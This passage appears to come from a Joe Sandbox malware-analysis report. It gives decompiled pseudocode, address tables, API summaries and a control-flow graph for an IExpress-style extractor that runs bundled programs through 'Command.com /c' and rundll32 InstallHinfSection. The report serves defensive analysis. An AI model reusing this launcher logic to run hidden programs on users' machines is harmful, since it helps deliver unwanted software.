										_v388 = 1;
										E0002202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0002468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x28c42;
									if( *0x28c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x28a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0002468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0002468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00021781( &_v276, 0x104, _t130, 0x28c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0002468F(_t130, 0x29a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                                0x00023baa
                                                                                                                                                                                                                                                0x00023bb0
                                                                                                                                                                                                                                                0x00023bb7
                                                                                                                                                                                                                                                0x00023bc0
                                                                                                                                                                                                                                                0x00023bc2
                                                                                                                                                                                                                                                0x00023bc9
                                                                                                                                                                                                                                                0x00023bcb
                                                                                                                                                                                                                                                0x00023bcf
                                                                                                                                                                                                                                                0x00023bd3
                                                                                                                                                                                                                                                0x00023bd9
                                                                                                                                                                                                                                                0x00023bfd
                                                                                                                                                                                                                                                0x00023bfd
                                                                                                                                                                                                                                                0x00023bff
                                                                                                                                                                                                                                                0x00023c03
                                                                                                                                                                                                                                                0x00023c03
                                                                                                                                                                                                                                                0x00023c11
                                                                                                                                                                                                                                                0x00023c16
                                                                                                                                                                                                                                                0x00023c19
                                                                                                                                                                                                                                                0x00023c28
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023c30
                                                                                                                                                                                                                                                0x00023c39
                                                                                                                                                                                                                                                0x00023c40
                                                                                                                                                                                                                                                0x00023d13
                                                                                                                                                                                                                                                0x00023d15
                                                                                                                                                                                                                                                0x00023d21
                                                                                                                                                                                                                                                0x00023d26
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023c4f
                                                                                                                                                                                                                                                0x00023c56
                                                                                                                                                                                                                                                0x00023c60
                                                                                                                                                                                                                                                0x00023c65
                                                                                                                                                                                                                                                0x00023c77
                                                                                                                                                                                                                                                0x00023c78
                                                                                                                                                                                                                                                0x00023c7c
                                                                                                                                                                                                                                                0x00023c7e
                                                                                                                                                                                                                                                0x00023c82
                                                                                                                                                                                                                                                0x00023c82
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023c7c
                                                                                                                                                                                                                                                0x00023c67
                                                                                                                                                                                                                                                0x00023c69
                                                                                                                                                                                                                                                0x00023c6d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023c58
                                                                                                                                                                                                                                                0x00023c58
                                                                                                                                                                                                                                                0x00023c6e
                                                                                                                                                                                                                                                0x00023c6e
                                                                                                                                                                                                                                                0x00023c87
                                                                                                                                                                                                                                                0x00023c89
                                                                                                                                                                                                                                                0x00023d4d
                                                                                                                                                                                                                                                0x00023d4f
                                                                                                                                                                                                                                                0x00023d50
                                                                                                                                                                                                                                                0x00023d52
                                                                                                                                                                                                                                                0x00023d9e
                                                                                                                                                                                                                                                0x00023da8
                                                                                                                                                                                                                                                0x00023daf
                                                                                                                                                                                                                                                0x00023db4
                                                                                                                                                                                                                                                0x00023db6
                                                                                                                                                                                                                                                0x00023f4d
                                                                                                                                                                                                                                                0x00023f4d
                                                                                                                                                                                                                                                0x00023f4f
                                                                                                                                                                                                                                                0x00023f56
                                                                                                                                                                                                                                                0x00023f57
                                                                                                                                                                                                                                                0x00023f58
                                                                                                                                                                                                                                                0x00023f63
                                                                                                                                                                                                                                                0x00023f63
                                                                                                                                                                                                                                                0x00023dbc
                                                                                                                                                                                                                                                0x00023dc0
                                                                                                                                                                                                                                                0x00023dc2
                                                                                                                                                                                                                                                0x00023de6
                                                                                                                                                                                                                                                0x00023de6
                                                                                                                                                                                                                                                0x00023de8
                                                                                                                                                                                                                                                0x00023f0b
                                                                                                                                                                                                                                                0x00023f0b
                                                                                                                                                                                                                                                0x00023f0f
                                                                                                                                                                                                                                                0x00023f13
                                                                                                                                                                                                                                                0x00023f15
                                                                                                                                                                                                                                                0x00023f1a
                                                                                                                                                                                                                                                0x00023f1c
                                                                                                                                                                                                                                                0x00023f46
                                                                                                                                                                                                                                                0x00023f47
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f47
                                                                                                                                                                                                                                                0x00023f1e
                                                                                                                                                                                                                                                0x00023f1f
                                                                                                                                                                                                                                                0x00023f25
                                                                                                                                                                                                                                                0x00023f26
                                                                                                                                                                                                                                                0x00023f2a
                                                                                                                                                                                                                                                0x00023f2d
                                                                                                                                                                                                                                                0x00023fd9
                                                                                                                                                                                                                                                0x00023fd9
                                                                                                                                                                                                                                                0x00023fda
                                                                                                                                                                                                                                                0x00023fda
                                                                                                                                                                                                                                                0x00023fe1
                                                                                                                                                                                                                                                0x00023fe3
                                                                                                                                                                                                                                                0x00023fe3
                                                                                                                                                                                                                                                0x00023fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023fe8
                                                                                                                                                                                                                                                0x00023f33
                                                                                                                                                                                                                                                0x00023f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f37
                                                                                                                                                                                                                                                0x00023dee
                                                                                                                                                                                                                                                0x00023dee
                                                                                                                                                                                                                                                0x00023df5
                                                                                                                                                                                                                                                0x00023fad
                                                                                                                                                                                                                                                0x00023fb9
                                                                                                                                                                                                                                                0x00023fc2
                                                                                                                                                                                                                                                0x00023fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023fc8
                                                                                                                                                                                                                                                0x00023dfb
                                                                                                                                                                                                                                                0x00023dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023e03
                                                                                                                                                                                                                                                0x00023e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023e15
                                                                                                                                                                                                                                                0x00023e17
                                                                                                                                                                                                                                                0x00023e19
                                                                                                                                                                                                                                                0x00023f94
                                                                                                                                                                                                                                                0x00023fa4
                                                                                                                                                                                                                                                0x00023f7c
                                                                                                                                                                                                                                                0x00023f80
                                                                                                                                                                                                                                                0x00023f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f8b
                                                                                                                                                                                                                                                0x00023e2c
                                                                                                                                                                                                                                                0x00023e30
                                                                                                                                                                                                                                                0x00023e34
                                                                                                                                                                                                                                                0x00023e36
                                                                                                                                                                                                                                                0x00023f69
                                                                                                                                                                                                                                                0x00023f6e
                                                                                                                                                                                                                                                0x00023f70
                                                                                                                                                                                                                                                0x00023f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f76
                                                                                                                                                                                                                                                0x00023e3c
                                                                                                                                                                                                                                                0x00023e43
                                                                                                                                                                                                                                                0x00023e47
                                                                                                                                                                                                                                                0x00023e52
                                                                                                                                                                                                                                                0x00023e56
                                                                                                                                                                                                                                                0x00023e5c
                                                                                                                                                                                                                                                0x00023e61
                                                                                                                                                                                                                                                0x00023e68
                                                                                                                                                                                                                                                0x00023e70
                                                                                                                                                                                                                                                0x00023e74
                                                                                                                                                                                                                                                0x00023e7c
                                                                                                                                                                                                                                                0x00023e80
                                                                                                                                                                                                                                                0x00023e82
                                                                                                                                                                                                                                                0x00023e82
                                                                                                                                                                                                                                                0x00023e87
                                                                                                                                                                                                                                                0x00023e87
                                                                                                                                                                                                                                                0x00023e8b
                                                                                                                                                                                                                                                0x00023e91
                                                                                                                                                                                                                                                0x00023e94
                                                                                                                                                                                                                                                0x00023e96
                                                                                                                                                                                                                                                0x00023e96
                                                                                                                                                                                                                                                0x00023e9b
                                                                                                                                                                                                                                                0x00023e9b
                                                                                                                                                                                                                                                0x00023e9f
                                                                                                                                                                                                                                                0x00023ea2
                                                                                                                                                                                                                                                0x00023ea4
                                                                                                                                                                                                                                                0x00023ea4
                                                                                                                                                                                                                                                0x00023ea9
                                                                                                                                                                                                                                                0x00023ea9
                                                                                                                                                                                                                                                0x00023ead
                                                                                                                                                                                                                                                0x00023eb3
                                                                                                                                                                                                                                                0x00023eb6
                                                                                                                                                                                                                                                0x00023eb8
                                                                                                                                                                                                                                                0x00023eb8
                                                                                                                                                                                                                                                0x00023ebd
                                                                                                                                                                                                                                                0x00023ebd
                                                                                                                                                                                                                                                0x00023ec1
                                                                                                                                                                                                                                                0x00023ec3
                                                                                                                                                                                                                                                0x00023ec5
                                                                                                                                                                                                                                                0x00023ec5
                                                                                                                                                                                                                                                0x00023eca
                                                                                                                                                                                                                                                0x00023eca
                                                                                                                                                                                                                                                0x00023ece
                                                                                                                                                                                                                                                0x00023ed5
                                                                                                                                                                                                                                                0x00023ed9
                                                                                                                                                                                                                                                0x00023ee0
                                                                                                                                                                                                                                                0x00023ee6
                                                                                                                                                                                                                                                0x00023eea
                                                                                                                                                                                                                                                0x00023eec
                                                                                                                                                                                                                                                0x00023eee
                                                                                                                                                                                                                                                0x00023ef3
                                                                                                                                                                                                                                                0x00023ef3
                                                                                                                                                                                                                                                0x00023ef5
                                                                                                                                                                                                                                                0x00023efa
                                                                                                                                                                                                                                                0x00023efb
                                                                                                                                                                                                                                                0x00023efd
                                                                                                                                                                                                                                                0x00023f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023eff
                                                                                                                                                                                                                                                0x00023eff
                                                                                                                                                                                                                                                0x00023f05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f05
                                                                                                                                                                                                                                                0x00023efd
                                                                                                                                                                                                                                                0x00023dc7
                                                                                                                                                                                                                                                0x00023dce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023dd0
                                                                                                                                                                                                                                                0x00023dd7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023dd9
                                                                                                                                                                                                                                                0x00023ddb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023ddd
                                                                                                                                                                                                                                                0x00023de1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023de1
                                                                                                                                                                                                                                                0x00023d59
                                                                                                                                                                                                                                                0x00023d65
                                                                                                                                                                                                                                                0x00023d6a
                                                                                                                                                                                                                                                0x00023d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d6e
                                                                                                                                                                                                                                                0x00023d75
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d8f
                                                                                                                                                                                                                                                0x00023d96
                                                                                                                                                                                                                                                0x00023d98
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d98
                                                                                                                                                                                                                                                0x00023c8f
                                                                                                                                                                                                                                                0x00023c98
                                                                                                                                                                                                                                                0x00023cf1
                                                                                                                                                                                                                                                0x00023cf3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023cfe
                                                                                                                                                                                                                                                0x00023d11
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d11
                                                                                                                                                                                                                                                0x00023c9c
                                                                                                                                                                                                                                                0x00023ca5
                                                                                                                                                                                                                                                0x00023ca7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023cad
                                                                                                                                                                                                                                                0x00023cb2
                                                                                                                                                                                                                                                0x00023cb7
                                                                                                                                                                                                                                                0x00023cc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023ce8
                                                                                                                                                                                                                                                0x00023cec
                                                                                                                                                                                                                                                0x00023ced
                                                                                                                                                                                                                                                0x00023ced
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023ce8
                                                                                                                                                                                                                                                0x00023c9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023c9e
                                                                                                                                                                                                                                                0x00023c56
                                                                                                                                                                                                                                                0x00023d35
                                                                                                                                                                                                                                                0x00023d35
                                                                                                                                                                                                                                                0x00023d3c
                                                                                                                                                                                                                                                0x00023d48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d48
                                                                                                                                                                                                                                                0x00023c03
                                                                                                                                                                                                                                                0x00023be2
                                                                                                                                                                                                                                                0x00023be7
                                                                                                                                                                                                                                                0x00023bee
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00023C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00023CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00028C42), ref: 00023D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00023E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00028C42), ref: 00023EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00028C42), ref: 00023F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00028C42), ref: 00023F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00028C42), ref: 00023F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00028C42), ref: 00023F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00028C42), ref: 00023F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00028C42), ref: 00023FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-3996648855
                                                                                                                                                                                                                                                • Opcode ID: 08b15947b43eee84976102f59d48c10d5f445ce07f17ca0ac707ada5a871aa23
                                                                                                                                                                                                                                                • Instruction ID: 1405d319e819bb86df9b27079ec46aad18c1ebdef632f4f87e3cc0aba5ff57f8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08b15947b43eee84976102f59d48c10d5f445ce07f17ca0ac707ada5a871aa23
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1D370A083219BE7B0DF24F945BAB76E4EB85700F20492EFA85D61D1DB7CC945CB92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00021AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 141 21ae8-21b2c call 21680 144 21b3b-21b40 141->144 145 21b2e-21b39 141->145 146 21b46-21b61 call 21a84 144->146 145->146 149 21b63-21b65 146->149 150 21b9f-21bc2 call 21781 call 2658a 146->150 152 21b68-21b6d 149->152 159 21bc7-21bd3 call 266c8 150->159 152->152 153 21b6f-21b74 152->153 153->150 155 21b76-21b7b 153->155 157 21b83-21b86 155->157 158 21b7d-21b81 155->158 157->150 161 21b88-21b8a 157->161 158->157 160 21b8c-21b9d call 21680 158->160 166 21d73-21d7f call 266c8 159->166 167 21bd9-21bf1 CompareStringA 159->167 160->159 161->150 161->160 174 21d81-21d99 CompareStringA 166->174 175 21df8-21e09 LocalAlloc 166->175 167->166 168 21bf7-21c07 GetFileAttributesA 167->168 170 21d53-21d5e 168->170 171 21c0d-21c15 168->171 176 21d64-21d6e call 244b9 170->176 171->170 173 21c1b-21c33 call 21a84 171->173 189 21c50-21c61 LocalAlloc 173->189 190 21c35-21c38 173->190 174->175 178 21d9b-21da2 174->178 179 21dd4-21ddf 175->179 180 21e0b-21e1b GetFileAttributesA 175->180 188 21e94-21ea4 call 26ce0 176->188 183 21da5-21daa 178->183 179->176 184 21e67-21e73 call 21680 180->184 185 21e1d-21e1f 180->185 183->183 191 21dac-21db4 183->191 198 21e78-21e84 call 22aac 184->198 185->184 187 21e21-21e3e call 21781 185->187 187->198 207 21e40-21e43 187->207 189->179 197 21c67-21c72 189->197 194 21c40-21c4b call 21a84 190->194 195 21c3a 190->195 196 21db7-21dbc 191->196 194->189 195->194 196->196 203 21dbe-21dd2 LocalAlloc 196->203 204 21c74 197->204 205 21c79-21cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->205 211 21e89-21e92 198->211 203->179 208 21de1-21df3 call 2171e 203->208 204->205 209 21cc2-21ccc 205->209 210 21cf8-21d07 205->210 207->198 212 21e45-21e65 call 216b3 * 2 207->212 208->211 216 21cd3-21cf3 call 21680 * 2 209->216 217 21cce 209->217 213 21d23 210->213 214 21d09-21d21 GetShortPathNameA 210->214 211->188 212->198 220 21d28-21d2b 213->220 214->220 216->211 217->216 224 21d32-21d4e call 2171e 220->224 225 21d2d 220->225 224->211 225->224
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00021AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x28004; // 0xf4950d3e
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00021680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00021A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00021781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E0002658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00021680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E000266C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E000266C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00021680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00021781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E000216B3( &_v1552, 0x400, " ");
										E000216B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00022AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0002171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00021A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00021A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E000244B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x29120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x21140, _t156, 8,  &_v268) == 0) {
										 *0x29a34 =  *0x29a34 & 0xfffffffb;
										if( *0x29a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0002171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x29a34 =  *0x29a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00021680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00021680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00026CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                                0x00021af3
                                                                                                                                                                                                                                                0x00021afa
                                                                                                                                                                                                                                                0x00021b07
                                                                                                                                                                                                                                                0x00021b09
                                                                                                                                                                                                                                                0x00021b1a
                                                                                                                                                                                                                                                0x00021b20
                                                                                                                                                                                                                                                0x00021b2c
                                                                                                                                                                                                                                                0x00021b3b
                                                                                                                                                                                                                                                0x00021b40
                                                                                                                                                                                                                                                0x00021b2e
                                                                                                                                                                                                                                                0x00021b2e
                                                                                                                                                                                                                                                0x00021b33
                                                                                                                                                                                                                                                0x00021b33
                                                                                                                                                                                                                                                0x00021b46
                                                                                                                                                                                                                                                0x00021b4c
                                                                                                                                                                                                                                                0x00021b52
                                                                                                                                                                                                                                                0x00021b57
                                                                                                                                                                                                                                                0x00021b5d
                                                                                                                                                                                                                                                0x00021b61
                                                                                                                                                                                                                                                0x00021b9f
                                                                                                                                                                                                                                                0x00021b9f
                                                                                                                                                                                                                                                0x00021bb1
                                                                                                                                                                                                                                                0x00021bc2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021b63
                                                                                                                                                                                                                                                0x00021b63
                                                                                                                                                                                                                                                0x00021b65
                                                                                                                                                                                                                                                0x00021b68
                                                                                                                                                                                                                                                0x00021b68
                                                                                                                                                                                                                                                0x00021b6a
                                                                                                                                                                                                                                                0x00021b6b
                                                                                                                                                                                                                                                0x00021b6f
                                                                                                                                                                                                                                                0x00021b74
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021b76
                                                                                                                                                                                                                                                0x00021b7b
                                                                                                                                                                                                                                                0x00021b86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021b8c
                                                                                                                                                                                                                                                0x00021b8c
                                                                                                                                                                                                                                                0x00021b98
                                                                                                                                                                                                                                                0x00021bc7
                                                                                                                                                                                                                                                0x00021bc9
                                                                                                                                                                                                                                                0x00021bcc
                                                                                                                                                                                                                                                0x00021bd3
                                                                                                                                                                                                                                                0x00021d75
                                                                                                                                                                                                                                                0x00021d76
                                                                                                                                                                                                                                                0x00021d78
                                                                                                                                                                                                                                                0x00021d7f
                                                                                                                                                                                                                                                0x00021e05
                                                                                                                                                                                                                                                0x00021e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021e12
                                                                                                                                                                                                                                                0x00021e1b
                                                                                                                                                                                                                                                0x00021e73
                                                                                                                                                                                                                                                0x00021e21
                                                                                                                                                                                                                                                0x00021e21
